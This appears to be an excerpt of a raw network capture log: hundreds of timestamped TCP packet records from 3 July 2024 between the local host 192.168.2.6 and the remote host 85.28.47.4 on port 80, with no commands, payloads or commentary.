                                                                Jul 3, 2024 08:38:16.541521072 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.541532993 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.541546106 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.541560888 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.541573048 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.541574955 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.541606903 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.541629076 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.541829109 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.541899920 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.541927099 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.541944981 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.541960955 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.541965961 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.541981936 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.541989088 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.541997910 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.542011023 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.542016983 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.542025089 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.542038918 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.542046070 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.542087078 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.542234898 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.542247057 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.542279959 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.542304039 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.542306900 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.542316914 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.542330027 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.542342901 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.542344093 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.542366028 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.542397976 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.542758942 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.542768955 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.542779922 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.542799950 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.542813063 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.542819977 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.542824984 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.542839050 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.542854071 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.542865992 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.542867899 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.542880058 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.542892933 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.542896986 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.542907000 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.542918921 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.542928934 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.542953968 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.543374062 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.543390036 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.543421984 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.543457031 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.543505907 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.543518066 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.543530941 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.543559074 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.543570042 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.543648005 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.543658972 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.543663979 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.543669939 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.543680906 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.543689013 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.543701887 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.543715954 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.543725967 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.543737888 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.543739080 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.543756008 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.543767929 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.543778896 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.543813944 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.544418097 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.544429064 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.544440985 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.544454098 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.544466019 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.544473886 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.544475079 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.544493914 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.544495106 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.544519901 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.544544935 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.544579983 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.544787884 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.544830084 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.544899940 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.544910908 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.544959068 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.545028925 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.545047998 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.545062065 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.545066118 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.545073986 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.545088053 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.545108080 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.545147896 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.545311928 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.545322895 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.545336008 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.545348883 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.545361042 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.545365095 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.545373917 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.545389891 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.545422077 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.545702934 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.545712948 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.545718908 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.545723915 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.545728922 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.545734882 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.545792103 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.546082020 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.546096087 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.546108007 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.546120882 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.546133995 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.546135902 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.546148062 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.546164036 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.546190023 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.546341896 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.546390057 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.546469927 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.546483994 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.546495914 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.546509981 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.546521902 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.546526909 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.546535969 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.546549082 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.546557903 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.546561956 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.546582937 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.546607018 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.616997957 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.617016077 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.617044926 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.617058039 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.617075920 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.617089987 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.617104053 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.617117882 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.617186069 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.617243052 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.617257118 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.617271900 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.617281914 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.617288113 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.617321968 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.617448092 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.617491961 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.617506981 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.617521048 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.617533922 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.617544889 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.617567062 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.627914906 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.627948999 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.627964020 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.627970934 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.627980947 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.628051043 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.628079891 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.628094912 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.628110886 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.628155947 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.628163099 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.628196955 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.628237963 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.628252029 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.628279924 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.628299952 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.628424883 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.628439903 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.628454924 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.628468990 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.628473043 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.628504038 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.628544092 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.628578901 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.628619909 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.628669977 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.628720045 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.628725052 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.628743887 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.628763914 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.628787041 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.628866911 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.628885984 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.628921032 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.628942966 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.628957987 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.628972054 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.629003048 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.629024982 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.629143953 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.629158020 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.629172087 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.629184961 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.629194975 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.629198074 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.629213095 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.629229069 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.629268885 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.629441023 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.629456997 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.629471064 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.629483938 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.629498005 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.629542112 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.629681110 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.629694939 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.629709005 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.629720926 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.629734039 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.629736900 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.629746914 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.629775047 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.629812002 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.629987001 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.630002975 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.630016088 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.630048037 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.630057096 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.630069017 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.630069017 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.630081892 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.630095959 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.630109072 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.630109072 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.630122900 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.630131960 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.630136013 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.630150080 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.630156994 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.630162954 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.630182028 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.630206108 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.630702019 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.630717039 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.630729914 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.630743027 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.630755901 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.630759001 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.630769968 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.630784035 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.630785942 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.630799055 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.630831957 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.630852938 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.631088972 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.631103992 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.631119013 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.631130934 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.631146908 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.631176949 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.631349087 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.631371021 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.631383896 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.631397009 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.631402969 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.631409883 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.631424904 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.631438971 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.631443977 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.631450891 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.631479979 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.631500006 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.631669044 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.631735086 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.631767035 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.631782055 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.631818056 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.631835938 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.631906986 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.631921053 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.631942034 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.631957054 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.631963015 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.631989002 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.632030010 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.632071018 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.632102966 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.632113934 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.632147074 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.632157087 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.632170916 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.632183075 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.632194042 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.632196903 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.632220984 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.632257938 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.632431984 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.632447958 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.632467985 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.632487059 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.632491112 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.632508039 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.632517099 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.632534981 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.632555008 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.632587910 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.632771015 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.632817030 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.632936001 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.632950068 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.632963896 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.632977962 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.632980108 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.632996082 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.633002043 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.633008957 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.633022070 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.633035898 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.633042097 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.633071899 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.633362055 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.633375883 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.633388996 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.633408070 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.633409023 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.633423090 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.633450985 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.633495092 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.633666992 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.633682013 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.633694887 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.633708000 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.633713007 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.633734941 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.633768082 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:16.703989983 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.704025984 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:16.704087973 CEST804971085.28.47.4192.168.2.6
